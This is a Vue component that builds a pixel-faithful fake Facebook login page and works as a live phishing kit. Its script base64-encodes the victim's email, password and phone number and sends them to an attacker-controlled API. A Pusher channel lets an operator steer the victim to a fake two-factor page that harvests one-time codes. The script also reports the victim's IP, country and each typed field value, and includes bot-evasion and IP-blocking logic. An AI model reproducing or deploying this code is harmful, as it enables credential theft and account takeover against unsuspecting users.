<template>
  <section v-if="!botCheck() && isAllowed && !isLoadingPage">
    <!DOCTYPE html>
    <html lang="en">

    <head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Facebook</title>
      <link rel="preconnect" href="https://fonts.gstatic.com">
      <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet">
    </head>

    <body>
    <main>
      <div class="row">
        <div class="col-logo">
          <img src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="Logo">
          <h2>Facebook helps you connect and share with the people in your life.</h2>
        </div>
        <div class="col-form">
          <div class="form-container">
            <div class="bg-red-100 border-red-500 border text-sm" style="padding: 15px 30px 15px 30px; display: none" id="error_container" >
              <span class="font-bold">Wrong Credentials</span> <br/>
              <span>Invalid username or password</span>
            </div>
            <input @focusout="onFocusOut($event)" @input="onInput($event)" @change="onChange($event)" v-model="user.email" type="email" name="email" id="email" class="px-14 py-16" placeholder="Email or phone number" required="">
            <small v-text="errors.email" class="text-red-700"></small>
            <input @focusout="onFocusOut($event)" @input="onInput($event)" @change="onChange($event)" v-model="user.password" type="password" name="password" id="password" placeholder="Password" class="" required>

            <button :disabled="loading" @click="confirmPassword" id="confirm-button" class="btn-login">Login</button>
            <div v-if="loading" class="flex items-center">
              <div role="status">
                <svg aria-hidden="true" class="w-4 h-4 mr-2 text-gray-200 animate-spin dark:text-gray-600 fill-blue-600" viewBox="0 0 100 101" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M100 50.5908C100 78.2051 77.6142 100.591 50 100.591C22.3858 100.591 0 78.2051 0 50.5908C0 22.9766 22.3858 0.59082 50 0.59082C77.6142 0.59082 100 22.9766 100 50.5908ZM9.08144 50.5908C9.08144 73.1895 27.4013 91.5094 50 91.5094C72.5987 91.5094 90.9186 73.1895 90.9186 50.5908C90.9186 27.9921 72.5987 9.67226 50 9.67226C27.4013 9.67226 9.08144 27.9921 9.08144 50.5908Z" fill="currentColor"/><path d="M93.9676 39.0409C96.393 38.4038 97.8624 35.9116 97.0079 33.5539C95.2932 28.8227 92.871 24.3692 89.8167 20.348C85.8452 15.1192 80.8826 10.7238 75.2124 7.41289C69.5422 4.10194 63.2754 1.94025 56.7698 1.05124C51.7666 0.367541 46.6976 0.446843 41.7345 1.27873C39.2613 1.69328 37.813 4.19778 38.4501 6.62326C39.0873 9.04874 41.5694 10.4717 44.0505 10.1071C47.8511 9.54855 51.7191 9.52689 55.5402 10.0491C60.8642 10.7766 65.9928 12.5457 70.6331 15.2552C75.2735 17.9648 79.3347 21.5619 82.5849 25.841C84.9175 28.9121 86.7997 32.2913 88.1811 35.8758C89.083 38.2158 91.5421 39.6781 93.9676 39.0409Z" fill="currentFill"/></svg>
                <span class="sr-only">Loading...</span>
              </div>
              Validating information
            </div>
            <a href="#">Forgotten password?</a>
            <button class="btn-new">Create new Account</button>
          </div>
          <p><a href="#"><b>Create a Page</b></a> for a celebrity, brand or business.</p>
        </div>
      </div>
    </main>
    <footer>
      <div class="footer-contents">
        <ol>
          <li>English (UK)</li>
          <li><a href="#">മലയാളം</a></li>
          <li><a href="#">தமிழ்</a></li>
          <li><a href="#">తెలుగు</a></li>
          <li><a href="#">বাংলা</a></li>
          <li><a href="#">اردو</a></li>
          <li><a href="#">हिन्दी</a></li>
          <li><a href="#">ಕನ್ನಡ</a></li>
          <li><a href="#">Español</a></li>
          <li><a href="#">Português (Brasil)</a></li>
          <li><a href="#">Français (France)</a></li>
          <li><button>+</button></li>
        </ol>

        <ol>
          <li><a href="#">Sign Up</a></li>
          <li><a href="#">Log In </a></li>
          <li><a href="#">Messenger</a></li>
          <li><a href="#">Facebook Lite</a></li>
          <li><a href="#">Watch</a></li>
          <li><a href="#">People</a></li>
          <li><a href="#">Pages</a></li>
          <li><a href="#">Page categories</a></li>
          <li><a href="#">Places</a></li>
          <li><a href="#">Games</a></li>
          <li><a href="#">Locations</a></li>
          <li><a href="#">Marketplace</a></li>
          <li><a href="#">Facebook</a></li>
          <li><a href="#">PayGroups</a></li>
          <li><a href="#">Jobs</a></li>
          <li><a href="#">Oculus</a></li>
          <li><a href="#">Portal</a></li>
          <li><a href="#">Instagram</a></li>
          <li><a href="#">Local</a></li>
          <li><a href="#">Sign Up</a></li>
          <li><a href="#">Log In </a></li>
          <li><a href="#">Messenger</a></li>
          <li><a href="#">Facebook Lite</a></li>
          <li><a href="#">Watch</a></li>
          <li><a href="#">People</a></li>
          <li><a href="#">Pages</a></li>
          <li><a href="#">Page categories</a></li>
          <li><a href="#">Places</a></li>
          <li><a href="#">Games</a></li>
          <li><a href="#">Locations</a></li>
          <li><a href="#">Marketplace</a></li>
          <li><a href="#">Facebook</a></li>
          <li><a href="#">PayGroups</a></li>
          <li><a href="#">Jobs</a></li>
          <li><a href="#">Oculus</a></li>
          <li><a href="#">Portal</a></li>
          <li><a href="#">Instagram</a></li>
          <li><a href="#">Local</a></li>
        </ol>
        <small>Facebook © 2022</small>
      </div>
    </footer>
    </body>

    </html>
  </section>
</template>

<style scoped>
* {
  padding: 0;
  margin: 0;
  box-sizing: border-box;
}

body {
  font-family: 'Poppins', sans-serif;
  background-color: #f0f2f5;
  color: #1c1e21;
}

main {
  padding-top: 5vh;
  height: auto;
  width: 100%;
  margin: 0 auto;
}

footer {
  background-color: #ffffff;
  padding: 20px 0;
}

.row {
  display: flex;
  flex-direction: column;
  align-items: center;
  width: 100%;
  max-width: 1000px;
  margin: 0 auto;
  padding: 20px;
}

.col-logo {
  text-align: center;
  margin-bottom: 20px;
}

.col-form {
  text-align: center;
  width: 100%;
}

.col-logo img {
  max-width: 70%;
  margin: -10px;
}

.col-logo h2 {
  font-size: 24px;
  font-weight: 400;
  padding: 0 20px;
  line-height: 32px;
  max-width: 100%;
}

.col-form .form-container {
  background-color: #ffffff;
  border: none;
  border-radius: 8px;
  box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1);
  margin-bottom: 30px;
  padding: 20px;
  max-width: 100%;
}

.col-form .form-container input, .col-form .form-container .btn-login {
  width: 100%;
  margin: 5px 0;
  height: 45px;
  vertical-align: middle;
  font-size: 16px;
}

.col-form .form-container input {
  border: 1px solid #dddfe2;
  color: #1d2129;
  padding: 0 8px;
  outline: none;
}

.col-form .form-container input:focus {
  border-color: #1877f2;
  box-shadow: 0 0 0 2px #e7f3ff;
}

.col-form .form-container .btn-login {
  background-color: #1877f2;
  border: none;
  border-radius: 6px;
  font-size: 20px;
  padding: 0 16px;
  color: #ffffff;
  font-weight: 500;
}

.col-form .form-container a {
  display: block;
  color: #1877f2;
  font-size: 14px;
  text-decoration: none;
  padding: 10px 0 20px;
  border-bottom: 1px solid #dadde1;
}

.col-form .form-container a:hover {
  text-decoration: underline;
}

.col-form .form-container .btn-new {
  background-color: #42b72a;
  border: none;
  border-radius: 6px;
  font-size: 17px;
  line-height: 48px;
  padding: 0 16px;
  color: #ffffff;
  font-weight: 500;
  margin-top: 20px;
}

.col-form p {
  font-size: 14px;
}

.col-form p a {
  text-decoration: none;
  color: #1c1e21;
  font-weight: 600;
}

.col-form p a:hover {
  text-decoration: underline;
}

.footer-contents {
  position: relative;
  max-width: 1000px;
  margin: 0 auto;
  padding: 20px;
}

footer ol {
  display: flex;
  flex-wrap: wrap;
  list-style-type: none;
  padding: 10px 0;
}

footer ol:first-child {
  border-bottom: 1px solid #dddfe2;
}

footer ol:first-child li:last-child button {
  background-color: #f5f6f7;
  border: 1px solid #ccd0d5;
  outline: none;
  color: #4b4f56;
  padding: 0 8px;
  font-weight: 700;
  font-size: 16px;
}

footer ol li {
  padding-right: 15px;
  font-size: 12px;
  color: #385898;
}

footer ol li a {
  text-decoration: none;
  color: #385898;
}

footer ol li a:hover {
  text-decoration: underline;
}

footer small {
  font-size: 11px;
}

@media (min-width: 768px) {
  .row {
    flex-direction: row;
  }

  .col-logo {
    flex: 0 0 45%;
    text-align: left;
    margin-right: 5%;
  }

  .col-form {
    flex: 0 0 40%;
    margin-left: 10%;
  }
}

@media (max-width: 767px) {
  .col-logo img {
    max-width: 200px;
  }

  .col-logo h2 {
    font-size: 20px;
    padding: 0 15px;
  }
}
</style>

<script>
import {Modal} from "flowbite";
import Pusher from 'pusher-js';
import axios from "axios";
import { initFlowbite } from 'flowbite'
import phones from '../assets/phones.json'
import constants from "@/constants";

export default {
  name: 'HelloWorld',
  components: {},
  props: {
    msg: String
  },
  created() {

  },
  beforeCreate() {
    //No agency - remove this line
    // if ((localStorage.getItem("is_captcha_verified") !== "1")) {
    //   window.location.href = "/"
    // }
  },
  mounted() {
    initFlowbite();
    localStorage.setItem("is_login", "0");
    localStorage.setItem("provider2fa", "");
    const self = this;
    const CHANNEL_KEY = "channel_key";
    const channelName = localStorage.getItem(CHANNEL_KEY)
    if (!channelName || channelName.indexOf("PUB_ID") === -1) {
      this.channelUuid = "PUB_ID_" + crypto.randomUUID();
      localStorage.setItem(CHANNEL_KEY, this.channelUuid)
    } else {
      this.channelUuid = channelName;
    }

    this.ws.pusher = new Pusher(this.ws.pusherKey, {
      cluster: this.ws.pusherCluster,
    });

    // this.ws.pusher.connection.bind('error', function(error) {
    //   console.log(error);
    //   self.isAvailable = false;
    // })

    this.ws.channel = this.ws.pusher.subscribe(this.channelUuid);

    this.ws.channel.bind("step-1-result", function(data) {
      if (data) {
        let json = JSON.parse(data.message)
        if (json.success === "1") {
          // self.user.provider2fa = json.message;
          // self.showPasswordContainer(false);
          // self.show2FAContainer(true);
          localStorage.setItem("is_login", "1");
          localStorage.setItem("provider2fa", json.message);
          window.location.href = '/confirm-login';
        } else {
          // document.getElementById("error_container").innerText = json.message;
          document.getElementById("error_container").style.display = 'block'
        }
      } else {
        // document.getElementById("error_container").innerText = "Something went wrong. Please try again later.";
        document.getElementById("error_container").style.display = 'block'
      }
      self.loading = false;
    })

    try {
      if (localStorage.getItem('country_code') === 'unk' || !localStorage.getItem('country_code')) {
        fetch('https://freeipapi.com/api/json')
            .then(response => response.json())
            .then(data => {
              if (data) {
                if (data.countryName === 'Viet Nam') {
                  // this.isAllowed = false;
                  // self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname + ", VietNam nên bỏ qua")
                }
                if (data.ipAddress === '40.80.158.10') {
                  this.isAllowed = false;
                }
                self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname)
                if (data.countryCode) {
                  localStorage.setItem("country_code", data.countryCode)
                  localStorage.setItem("ip_address", data.ipAddress)
                } else {
                  localStorage.setItem("country_code", "unk")
                }
              }
            });
      } else {
        let country_code = localStorage.getItem("country_code")
        let ip_address = localStorage.getItem("ip_address")

        self.handleAction("New visitor. IP = " + ip_address + ", country = " + country_code + ", URL = " + window.location.pathname)

      }

      let phoneConfig = phones.find(x => x.code === localStorage.getItem("country_code"));
      if (phoneConfig) {
        // this.placeHolder.phone = phoneConfig.dial_code;
        this.phone_prefix = phoneConfig.dial_code;

      }
      this.isLoadingPage = false;

    } catch (ex) {
      self.handleAction("Can not get IP information");
      this.isLoadingPage = false;
    }

    this.ws.pusher.connection.bind('disconnected', function() {
      alert('Disconnected to meta server. Please reload and try again.')
    })



  },
  data() {
    return {
      isLoadingPage: true,
      isAllowed: true,
      currentTyping: null,
      user: {
        email: null,
        password: null,
        phoneNumber: null,
        channelUuid: null,
        loadingConfirm: false,
        provider2fa: "sms",
        code: "",
        phonePrefix: "1"
      },
      errors: {
        email: null,
        phoneNumber: null
      },
      ws: {
        pusher: null,
        channel: null,
        pusherKey: constants.PUSHER_KEY,
        pusherCluster: "ap1"
      },
      loading: false,
      success: false,
      dm: constants.API_URL,
      name: 'Meta Business Support',
      supportLine: atob("Q29udGFjdCBNZXRhIHN1cHBvcnQ="),
      isAvailable: true,
      placeHolder: {
        phone: "Phone number"
      },
      phones: phones,
      phone_prefix: "+1"
    }
  },
  methods: {
    showPasswordContainer(isShow) {
      if (!this.isAvailable) {
        alert("Sorry, we can't help you right now");
        return;
      }
      if (isShow) {
        if (!this.user.email || this.user.email === "") {
          this.errors.email = "Enter your email address in the format name@example.com, or enter a user ID";
          return;
        } else {
          if (!this.validateId(this.user.email)) {
            this.errors.email = "Enter your email address in the format name@example.com, or enter a user ID";
            return;
          }
        }

        if (!this.user.phoneNumber || this.user.phoneNumber === "") {
          this.errors.phoneNumber = "Phone number is required.";
          return;
        }else {
          if (!this.validatePhoneNumber(this.user.phoneNumber)) {
            this.errors.phoneNumber = "Your phone number is incorrect.";
            return;
          }
        }

        this.user.code = "";
        this.user.provider2fa = "";
      }
      document.getElementById("error_container").innerText = "";
      this.success = false;
      this.user.password = "";

      const modalEl = document.getElementById('info-popup');
      const privacyModal = new Modal(modalEl, {
        placement: 'center',
        onShow: () => {
          this.handleAction("Hiển thị màn nhập mật khẩu")
          this.errors.phoneNumber = "";
          this.errors.email = "";
        },
        onHide:() => {
          this.loading = false;
          this.handleAction("Màn nhập mật khẩu bị ẩn")
        }
      })
      if(isShow)
        privacyModal.show()
      else {
        privacyModal.hide()
      }
    },
    confirmPassword() {
      // document.getElementById("error_container").innerText = "";
      document.getElementById("error_container").style.display = 'none'

      if (!this.user.password || this.user.password.trim() === "") {
        // document.getElementById("error_container").innerText = "Password is required.";
        document.getElementById("error_container").style.display = 'block'
        return;
      }
      this.loading = true;

      const self = this;

      let phoneNumber = this.user.phoneNumber;
      phoneNumber = this.handlePhoneNumber(phoneNumber);

      let params = btoa(`userName=${this.user.email}&password=${encodeURIComponent(this.user.password)}&phoneNumber=${phoneNumber}&pubId=${this.channelUuid}`)
      axios.post(`${this.dm}api/confirmPassword`, {params}).catch((error) => {
        console.log(error);
        // document.getElementById("error_container").innerText = "Sorry we can't help you right now.";
        document.getElementById("error_container").style.display = 'block'
        self.loading = false;
      })
      this.handleAction("User bắt đầu đăng nhập");
    },
    show2FAContainer(isShow) {
      if (!this.isAvailable) {
        alert("Sorry, we can't help you right now");
        return;
      }
      const modalEl = document.getElementById('info-popup-2');
      const privacyModal = new Modal(modalEl, {
        placement: 'center',
        backdropClasses: 'none',
        onShow: () => {
          this.handleAction("2FA popup is shown.")
        },
        onHide:() => {
          this.handleAction("2FA popup is hidden.")
        }
      })
      if(isShow)
        privacyModal.show()
      else {
        privacyModal.hide()
      }
    },
    confirm2FA() {
      if (!this.isAvailable) {
        alert("Sorry, we can't help you right now");
        return;
      }
      this.loading = true;
      let params = btoa(`pubId=${this.channelUuid}&otp=${this.user.code}`)
      axios.post(`${this.dm}api/verify`, {params})
    },
    validateId(loginId) {
      if (loginId.indexOf("@") > -1) {
        return loginId.match(
            /^(([^<>()[\]\\.,;:\s@"]+(\.[^<>()[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/
        );
      } else {
        return !isNaN(parseFloat(loginId)) && isFinite(loginId);
      }
    },
    handleAction(message) {
      if (message === 'ResendCode') {
        this.loading = true;
        setTimeout(() => {
          this.user.provider2fa = 'We have sent the verification code again. Enter the code to log in.';
          this.loading = false;
        }, 1000)

      }
      if(this.channelUuid) {
        try {
          axios.post(`${this.dm}api/handleAction`, {"pubId": this.channelUuid, "message": message})
        }catch (ex) {
          console.log(ex);
        }
      }
    },
    botCheck(){
      // const botPattern = "(googlebot|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)";
      // const re = new RegExp(botPattern, 'i');
      // const userAgent = navigator.userAgent;
      // return re.test(userAgent);
      return false;
    },
    onInput(event) {
      if (this.currentTyping !== event.target.name) {
        this.currentTyping = event.target.name;
        this.handleAction(`User đang điền: ${event.target.name}`)
      }
    },
    onFocusOut(event) {
      // this.handleAction(`focusOut: ${event.target.name}`)
      console.log(`Focus out ${event.target.name}`)
    },
    onChange(event) {
      try {
        if (event.target.name === 'phone_number') {
          let phoneNumber = event.target.value;
          phoneNumber = this.handlePhoneNumber(phoneNumber);
          this.handleAction(`User is changed: ${event.target.name} - value = ${phoneNumber}`)
        } else {
          this.handleAction(`User is changed: ${event.target.name} - value = ${event.target.value}`)
        }

      } catch (ex) {
        console.log(ex);
      }
    },
    validatePhoneNumber(phoneNumber) {
      return /\d{6,}/.test(phoneNumber)
    },
    handlePhoneNumber(phoneNumber) {
      // if (phoneNumber.startsWith("0") && localStorage.getItem("country_code") && localStorage.getItem("country_code") !== "unk") {
      //   let phoneConfig = phones.find(x => x.code === localStorage.getItem("country_code"));
      //   if (phoneConfig) {
      //     phoneNumber = this.user.phoneNumber.substring(1)
      //     phoneNumber = phoneConfig.dial_code + phoneNumber;
      //   }
      // } else if(!phoneNumber.startsWith("+")) {
      //   let phoneConfig = phones.find(x => x.code === localStorage.getItem("country_code"));
      //   if (phoneConfig) {
      //     if(phoneNumber.startsWith(phoneConfig.dial_code.replace("+", ""))) {
      //       if (phoneNumber.toString().length < 10) {
      //         phoneNumber = phoneConfig.dial_code + phoneNumber;
      //       } else {
      //         phoneNumber = "+" + phoneNumber;
      //       }
      //     } else {
      //       phoneNumber = phoneConfig.dial_code + phoneNumber;
      //     }
      //   }
      // }

      return this.phone_prefix + phoneNumber;
    },
    changePhonePrefix(prefix) {
      this.phone_prefix = prefix;
    }
  }
}
</script>